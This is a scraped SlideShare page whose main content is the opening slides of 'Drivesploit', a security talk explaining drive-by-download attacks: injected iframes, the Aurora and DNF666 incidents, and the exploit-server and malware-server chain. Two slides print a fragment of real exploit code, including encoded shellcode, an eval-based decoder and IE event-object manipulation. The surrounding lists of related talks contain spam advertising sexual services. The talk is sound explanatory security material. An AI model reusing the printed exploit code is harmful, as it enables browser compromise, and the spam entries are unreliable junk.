2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the YearJeremiah Grossman
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosCONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosPROIDEA
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Fireshark - Brucon 2010
Fireshark - Brucon 2010Fireshark - Brucon 2010
Fireshark - Brucon 2010Stephan Chenette
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 

Más contenido relacionado

La actualidad más candente

Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraKrzysztof Kotowicz
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the YearJeremiah Grossman
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosCONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosPROIDEA
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEFMichele Orru
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript SecurityJason Harwig
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Securityjgrahamc
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 

La actualidad más candente (20)

Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
 
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosCONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan Kuskos
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012
 
Protecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Javascript Security
Javascript SecurityJavascript Security
Javascript Security
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 

Similar a Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection

OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
Rahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_CodeRahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_Codeguest66dc5f
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
2013 Security Threat Report Presentation
2013 Security Threat Report Presentation2013 Security Threat Report Presentation
2013 Security Threat Report PresentationSophos
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Smartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking MalwaremalwareSmartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking MalwaremalwarePositive Hack Days
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】Hacks in Taiwan (HITCON)
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
Magic of RATs(Remote Access Torgens)
Magic of RATs(Remote Access Torgens)Magic of RATs(Remote Access Torgens)
Magic of RATs(Remote Access Torgens)Open Knowledge Nepal
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisIan G
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...Aditya K Sood
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Julia Yu-Chin Cheng
 

Similar a Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection (20)

Fireshark - Brucon 2010
Fireshark - Brucon 2010Fireshark - Brucon 2010
Fireshark - Brucon 2010
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
Rahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_CodeRahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_Code
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
2013 Security Threat Report Presentation
2013 Security Threat Report Presentation2013 Security Threat Report Presentation
2013 Security Threat Report Presentation
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Recent Rogueware
Recent RoguewareRecent Rogueware
Recent Rogueware
 
Smartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking MalwaremalwareSmartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking Malwaremalware
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 
Magic of RATs(Remote Access Torgens)
Magic of RATs(Remote Access Torgens)Magic of RATs(Remote Access Torgens)
Magic of RATs(Remote Access Torgens)
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and Analysis
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
 

Último

CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 

Último (20)

CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 

Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection

  • 1. 掛馬免殺 DRIVESPLOIT CIRCUMVENTING AUTOMATED AND MANUAL DETECTION OF BROWSER EXPLOITS Wayne Huang, Cofounder & CTO Fyodor Yarochkin Antonio Rohman Fernandez Chris Hsiao Armorize Technologies, Inc. @waynehuang wayne@armorize.com @ i
  • 2. One type of browser exploit: Drive-by Downloads defined 2
  • 3. Drive-by-Download Explained • Hackers distribute malware by "poisoning" legitimate websites • Typical: injects malicious iframes into HTML content 3
  • 4. Drive-by-Download Explained • Affected websites: – Essentially becomes a delivery mechanism for malware – Appear normal • Victims – Do not need to "click" or "agree to" anything – Simply connecting to the website executes the attack 4
  • 5. Drive-by Download Incidents • Aurora (Google) – June 2009-Feb 2010 –TTargeted attack t d tt k – IE 0day CVE-2010-0249 – Confirmed publicly by Google, Adobe Systems, Juniper Networks and R kS d RackSpace – Total of 34 organization targeted g g
  • 6. Drive-by Download Incidents • DNF666 Mass SQL Injection – Since March, 2010 –JJun: Adobe 0day CVE-2010-1297 Ad b 0d CVE 2010 1297 – Victims: Wall Street Journal, Jarusalem P t etc J l Post, t – dnf666.net, robint.us, 2677.in, 4589.in, 22d f 4589 i 22dnf.com
  • 7. CNN
  • 12. Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d 12
  • 13. Dissecting Drive-By Downloads Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  13
  • 14. Dissecting Drive-By Downloads Exploit! Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  14
  • 15. Dissecting Drive-By Downloads Exploit! Exploits / droppers Exploits / droppers Dropper executes Exploit Server 15
  • 16. Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server 16
  • 17. Dissecting Drive-By Downloads Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 17
  • 18. Dissecting Drive-By Downloads But who would visit? But who would visit? The key now is TRAFFIC Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 18
  • 19. (1) Legitimate, injectable sites URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 19
